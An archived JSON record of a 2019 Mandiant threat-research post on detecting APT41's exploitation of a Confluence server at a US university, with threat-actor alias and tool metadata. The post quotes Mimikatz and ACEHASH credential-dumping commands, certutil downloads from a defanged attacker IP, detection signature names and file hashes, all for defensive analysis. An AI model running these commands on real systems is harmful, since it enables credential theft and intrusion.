{ "id": "46d2efbe-5e7e-41a7-b269-da217f9b588e", "created_at": "2026-04-06T00:16:46.797014Z", "updated_at": "2026-04-10T03:32:20.68838Z", "deleted_at": null, "sha1_hash": "002d8d0f84568a958a0c0073b9daca8bad4b23d4", "title": "GAME OVER: Detecting and Stopping an APT41 Operation | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 747932, "plain_text": "GAME OVER: Detecting and Stopping an APT41 Operation |\r\nMandiant\r\nBy Mandiant\r\nPublished: 2019-08-19 · Archived: 2026-04-05 17:21:08 UTC\r\nWritten by: Alex Pennino, Matt Bromiley\r\nIn August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group, APT41. A\r\nChina-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare,\r\nhigh-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes\r\nand detections within victim environments, often recompiling malware within hours of incident responder activity.\r\nIn multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and\r\nexploiting within a matter of days.\r\nOur knowledge of this group’s targets and activities are rooted in our Incident Response and Managed Defense\r\nservices, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse\r\nmalware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed\r\nDefense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.\r\nIn this blog post, we’re going to examine a recent instance where FireEye Managed Defense came toe-to-toe with\r\nAPT41. Our goal is to display not only how dynamic this group can be, but also how the various teams within\r\nFireEye worked to thwart attacks within hours of detection – protecting our clients’ networks and limiting the\r\nthreat actor’s ability to gain a foothold and/or prevent data exposure.\r\nGET TO DA CHOPPA!\r\nIn April 2019, FireEye’s Managed Defense team identified suspicious activity on a publicly-accessible web server\r\nat a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the\r\nattackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path\r\ntraversal and remote code execution.\r\nhttps://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html\r\nPage 1 of 7\n\nFigure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability\r\nThis vulnerability relies on the following actions by the attacker:\r\nCustomizing the _template field to utilize a template that allowed for command execution.\r\nInserting a cmd field that provided the command to be executed.\r\nThrough custom JSON POST requests, the attackers were able to run commands and force the vulnerable system\r\nto download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.\r\nhttps://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html\r\nPage 2 of 7\n\nFigure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396\r\nAs shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-\r\n3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue\r\narbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.\r\nFigure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system\r\nhttps://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html\r\nPage 3 of 7\n\nThe HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system\r\nreconnaissance and utilized Windows certutil.exe to download a file located at\r\nhxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The\r\nfile test.jsp was ultimately identified to be a variant of a China Chopper webshell.\r\nA Passive Aggressive Operation\r\nShortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the\r\nsystem:\r\n64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)\r\nIns64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)\r\nBoth files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was\r\nused to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple\r\ncomponents, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy\r\none of two embedded drivers to conceal network traffic and communicate with its command and control server to\r\ndownload and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as\r\nHIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON\r\nmalware family can be found in our full APT41 report).\r\nWithin the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to\r\nissue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web\r\nshell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:\r\nMovement of 64.dat and Ins64.exe to C:\\Program Files\\Atlassian\\Confluence\r\nPerforming a directory listing of C:\\Program Files\\Atlassian\\Confluence\r\nPerforming a directory listing of C:\\Users\r\nAdditionally, FireEye’s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON\r\nbackdoor, allowing us to decode the attacker’s traffic. Figure 4 provides a list of the various commands issued by\r\nthe attacker utilizing HIGHNOON.\r\nhttps://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html\r\nPage 4 of 7\n\nFigure 4: Decoded HIGHNOON commands issued by the attacker\r\nPlaying Their ACEHASH Card\r\nAs shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that\r\ndownloaded a script from PowerSploit, a well-known PowerShell Post-Exploitation Framework. At the time of\r\nthis blog post, the script was no longer available for downloading. The commands provided to the script –\r\n“privilege::debug sekurlsa::logonpasswords exit exit” – indicate that the unrecovered script was likely a copy of\r\nInvoke-Mimikatz, reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this\r\ncommand failed.\r\nhttps://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html\r\nPage 5 of 7\n\nAfter performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional\r\nfiles into the C:\\Program Files\\Atlassian\\Confluence directory:\r\nc64.exe (MD5: 846cdb921841ac671c86350d494abf9c)\r\nF64.data (MD5: a919b4454679ef60b39c82bd686ed141)\r\nThese two files are the dropper and encrypted/compressed payload components, respectively, of a malware family\r\nknown as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the\r\nfunctionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).\r\nUpon placing c64.exe and F64.data on the system, the attacker ran the command\r\nc64.exe f64.data \"9839D7F1A0 -m”\r\nThis specific command provided a password of “9839D7F1A0” to decrypt the contents of F64.data, and a switch\r\nof “-m”, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password\r\nprovided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.\r\nUltimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the\r\nvulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single\r\ncredential from the system. However, as Managed Defense detected this activity rapidly via network signatures,\r\nthis operation was neutralized before the attackers progressed any further.\r\nKey Takeaways From This Incident\r\nAPT41 utilized multiple malware families to maintain access into this environment; impactful remediation\r\nrequires full scoping of an incident.\r\nFor effective Managed Detection \u0026 Response services, having coverage of both Endpoint and Network is\r\ncritical for detecting and responding to targeted attacks.\r\nAttackers may weaponize vulnerabilities quickly after their release, especially if they are present within a\r\ntargeted environment. Patching of critical vulnerabilities ASAP is crucial to deter active attackers.\r\nDetecting the Techniques\r\nFireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China\r\nChopper.\r\nDetection Signature Name\r\nChina Chopper FE_Webshell_JSP_CHOPPER_1\r\n  FE_Webshell_Java_CHOPPER_1\r\n  FE_Webshell_MSIL_CHOPPER_1\r\nHIGHNOON.PASSIVE FE_APT_Backdoor_Raw64_HIGHNOON_2\r\nhttps://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html\r\nPage 6 of 7\n\nFE_APT_Backdoor_Win64_HIGHNOON_2\r\nCertutil Downloader CERTUTIL.EXE DOWNLOADER (UTILITY)\r\n  CERTUTIL.EXE DOWNLOADER A (UTILITY)\r\nACEHASH FE_Trojan_AceHash\r\nIndicators\r\nType Indicator MD5 Hash (if applicable)\r\nFile test.jsp 84d6e4ba1f4268e50810dacc7bbc3935\r\nFile 64.dat 51e06382a88eb09639e1bc3565b444a6\r\nFile Ins64.exe e42555b218248d1a2ba92c1532ef6786\r\nFile c64.exe 846cdb921841ac671c86350d494abf9c\r\nFile F64.data a919b4454679ef60b39c82bd686ed141\r\nIP Address 67.229.97[.]229 N/A\r\nLooking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41’s activities. Here's a\r\ndirect link to the public APT41 report.\r\nAcknowledgements\r\nSpecial thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for\r\nidentification and reversing of the HIGHNOON.PASSIVE malware.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html\r\nhttps://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html\r\nPage 7 of 7", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html" ], "report_names": [ "game-over-detecting-and-stopping-an-apt41-operation.html" ], "threat_actors": [ { "id": "c7d9878a-e691-4c6f-81ae-84fb115a1345", "created_at": "2022-10-25T16:07:23.359506Z", "updated_at": "2026-04-10T02:00:04.556639Z", "deleted_at": null, "main_name": "APT 41", "aliases": [ "BrazenBamboo", "Bronze Atlas", "Double Dragon", "Earth Baku", "G0096", "Grayfly", "Operation ColunmTK", "Operation CuckooBees", "Operation ShadowHammer", "Red Kelpie", "SparklingGoblin", "TA415", "TG-2633" ], "source_name": "ETDA:APT 41", "tools": [ "9002 RAT", "ADORE.XSEC", "ASPXSpy", "ASPXTool", "AceHash", "Agent.dhwf", "Agentemis", "AndroidControl", "AngryRebel", "AntSword", "BLUEBEAM", "Barlaiy", "BlackCoffee", "Bladabindi", "BleDoor", "CCleaner Backdoor", "CHINACHOPPER", "COLDJAVA", "China Chopper", "ChyNode", "Cobalt Strike", "CobaltStrike", "Crackshot", "CrossWalk", "CurveLast", "CurveLoad", "DAYJOB", "DBoxAgent", "DEADEYE", "DEADEYE.APPEND", "DEADEYE.EMBED", "DEPLOYLOG", "DIRTCLEANER", "DUSTTRAP", "Derusbi", "Destroy RAT", "DestroyRAT", "DodgeBox", "DragonEgg", "ELFSHELF", "EasyNight", "Farfli", "FunnySwitch", "Gh0st RAT", "Ghost RAT", "HDD Rootkit", "HDRoot", "HKDOOR", "HOMEUNIX", "HUI Loader", "HidraQ", "HighNoon", "HighNote", "Homux", "Hydraq", "Jorik", "Jumpall", "KEYPLUG", "Kaba", "Korplug", "LATELUNCH", "LOLBAS", "LOLBins", "LightSpy", "Living off the Land", "Lowkey", "McRAT", "MdmBot", "MessageTap", "Meterpreter", "Mimikatz", "MoonBounce", "MoonWalk", "Motnug", "Moudour", "Mydoor", "NTDSDump", "PACMAN", "PCRat", "PINEGROVE", "PNGRAT", "POISONPLUG", "POISONPLUG.SHADOW", "POTROAST", "PRIVATELOG", "PipeMon", "PlugX", "PortReuse", "ProxIP", "ROCKBOOT", "RbDoor", "RedDelta", "RedXOR", "RibDoor", "Roarur", "RouterGod", "SAGEHIRE", "SPARKLOG", "SQLULDR2", "STASHLOG", "SWEETCANDLE", "ScrambleCross", "Sensocode", "SerialVlogger", "ShadowHammer", "ShadowPad Winnti", "SinoChopper", "Skip-2.0", "SneakCross", "Sogu", "Speculoos", "Spyder", "StealthReacher", "StealthVector", "TERA", "TIDYELF", "TIGERPLUG", "TOMMYGUN", "TVT", "Thoper", "Voldemort", "WIDETONE", "WINNKIT", "WINTERLOVE", "Winnti", "WyrmSpy", "X-Door", "XDOOR", "XMRig", "XShellGhost", "Xamtrav", "ZXShell", "ZoxPNG", "certutil", "certutil.exe", "cobeacon", "gresim", "njRAT", "pwdump", "xDll" ], "source_id": "ETDA", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434606, "ts_updated_at": 1775791940, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/002d8d0f84568a958a0c0073b9daca8bad4b23d4.pdf", "text": "https://archive.orkl.eu/002d8d0f84568a958a0c0073b9daca8bad4b23d4.txt", "img": "https://archive.orkl.eu/002d8d0f84568a958a0c0073b9daca8bad4b23d4.jpg" } }